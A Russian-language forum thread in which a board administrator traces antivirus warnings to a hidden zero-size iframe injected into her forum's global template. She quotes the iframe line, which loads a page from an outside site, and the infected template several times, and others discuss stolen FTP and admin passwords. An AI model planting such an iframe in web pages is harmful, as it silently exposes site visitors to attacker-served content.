Троян Backdoor на форуме

[ElenaI]

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже

Версия форума 2.2.2, лицензионная

[ElenaI]

Друзья мои, ОГРОМНОЕ спасибо за поддержку и предложенную помощь.

Представьте себе, я таки нашла эту дрянь! Она сидела в общем шаблоне форума, куда я даже не догадалась полезть (смотрела в html шаблонах, как рекомендовали, а на этот не обратила внимание)... Господи, как же все было просто

Вот оно:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-type" content="text/html; charset=<% CHARSET %>" />

<link rel="shortcut icon" href="favicon.ico" />

<title><% TITLE %></title>

<% GENERATOR %>

<% CSS %>

<% JAVASCRIPT %>

</head>

<body>

<div id="ipbwrapper">

<% BOARD HEADER %>

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

<% MEMBER BAR %>

<% NAVIGATION %>

<!--IBF.NEWPMBOX-->

<% BOARD %>

<% BOARD FOOTER %>

<% STATS %>

<% COPYRIGHT %>

</div>

</body>

</html>

 

В общем, всем спасибо. Я серьезно.

Только у меня вопрос - эту строку я просто удалила, но теперь при ответах в форум страница грузится с ошибкой - требуется объект (а раньше на той строке был прописан вирус, и мой комп его запрещал). Кто-нить мог бы у себя в админке глянуть - на месте выделенного мною жирным шрифтом у вас что-то прописано? Не урл ли форума?

[Stiks]

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

У меня этой строки вообще нет.

[Brun_]

2 ElenaI Как взломали незнаю лень лог читать/ Но после фикса такого уже небsло.

 

Как на меня, то вам нужно забєкапить базу; переставить форум; следить за обновлениями.

[Song]

ЕленаI туда нужно было посмотреть в первую очередь.

[ElenaI]

ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось.

[TOIIOP]

После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

[ElenaI]

После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

Да, спасибо. Пароли я сменила сразу, как выяснилось, что на форме вирус. Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать? Я не очень в этом разбираюсь, поэтому прошу прощеняи за глупый вопрос, но мне казалось, что с шаблонами форума можно работать только через админку форума, по крайней мере, с общим шаблоном...

[Sannis]

На ФТП его не достать. Так что или узнали пароль от БД(маловероятно), либо пароль админа. Проверьте что у вас стоят все обновления безопасности(ссылка в подписи: Wiki).

[Nonamers]

Саннис, ну ты даЙОшь )) .. а какже cache ?

[Sannis]

В кеше нет Глобального шаблона

[Nonamers]

В кеше нет Глобального шаблона

skin_global.php ... например я выбрал папку cacheid_2.... пропиши что-нибудь(лол там и т.д. ) на 395(например) строке файла и посмотри на результат ))

[Song]

ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось.

Я не техподдержка

 

Nonamers

 

глобальный шаблон форума (Board Wrapper) не хранится в skin_global

[Nonamers]

глобальный шаблон форума (Board Wrapper) не хранится в skin_global

я просто говорил что через файлы кеша можно прописать хоть что... а не обязательно через админку

[Song]

ещё раз: глобальный шаблон форума не хранится ни в файловом кеше (skin_*.php), ни в БД кеше (cache_store).

Поэтому его нельзя изменить сказанными вами способом.

[Nonamers]

я же изменил... скрин показать ?

[Song]

ну ты как маленький =)

я ж не просто так спорю, а смотрю код форума и вижу откуда там чего берётся.

 

ну ок, покажи, что именно и где именно ты менял в skin_*.php

[Nonamers]

cache\skin_cache\cacheid_2\

 

skin_global.php

 

<!-- Msg Layer -->
<div id='ipd-msg-wrapper'>
<div id='ipd-msg-title'>
	<a href='#' onclick='document.getElementById(\"ipd-msg-wrapper\").style.display=\"none\"; return false;'><img src='style_images/<#IMG_DIR#>/close.png' alt='X' title='Close Window' class='ipd' /></a>   <strong>{$this->ipsclass->lang['gbl_sitemsg_header']}</strong>
</div>
<div id='ipd-msg-inner'><span style='font-weight:bold' id='ipd-msg-text'></span><div class='pp-tiny-text'>{$this->ipsclass->lang['gbl_auto_close']}</div></div>
</div>
<!-- Msg Layer -->
") : ("")) . "
[b][color="#FF0000"]test[/color][/b]
<!-- / End board header -->";

 

http://rl.foto.radikal.ru/0709/4a/a5dfc2030b2et.jpg

 

p.s. версия 2.3.1

[Song]

ну так это не глобальный шаблон форума.

Глобальный шаблон форума вот:

Он не хранится в кеше.

 

Так что

В кеше нет Глобального шаблона

совершенно верно.

[Nonamers]

да че ты пристал со своим глобальным шаблоном )) не в этом суть была

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

[Song]

да че ты пристал со своим глобальным шаблоном

Как "чего это я пристал".

Елена нашла следы именно в глобальном шаблоне, а не в где-то в skin_*.php. Саннис говорил тебе про глобальный шаблон. Говорил что нет его в кеше, ты спорил. Я согласился с ним.

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

ок, вот http://forum.sysman.ru/uploads/at/7/post-22-1188926329_thumb.jpg

 

skin_global.php это не есть глобальный шаблон форума.

Это игра слов, не более.

[Nonamers]

вообще, я отвечал на этот вопрос

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

ну да ладно забили

[Song]

Нельзя его достать физически по FTP.

А skin_global.php, про который вы привели пример физической записи - это не то, про что она имела ввиду.

[Nonamers]

Сонг мы о разном..

[Song]

Пойми, что

 

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

"строку вписали в общий шаблон форума" - это как раз глобальный шаблон форума.

"а его в физическом виде по FTP разве можно достать" - "а его [глобальный шаблон] разве можно физически достать?" - ответ "Нет"

 

 

Ты привёл пример записи в skin_global.php это не общий шаблон, и она не про него говорила.

[Song]

И?